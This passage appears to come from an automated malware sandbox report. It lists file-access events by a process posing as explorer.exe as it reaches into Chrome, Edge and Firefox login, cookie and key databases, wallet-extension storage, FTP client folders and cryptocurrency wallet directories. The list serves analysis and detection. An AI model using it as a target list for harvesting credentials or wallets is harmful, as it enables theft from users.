                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
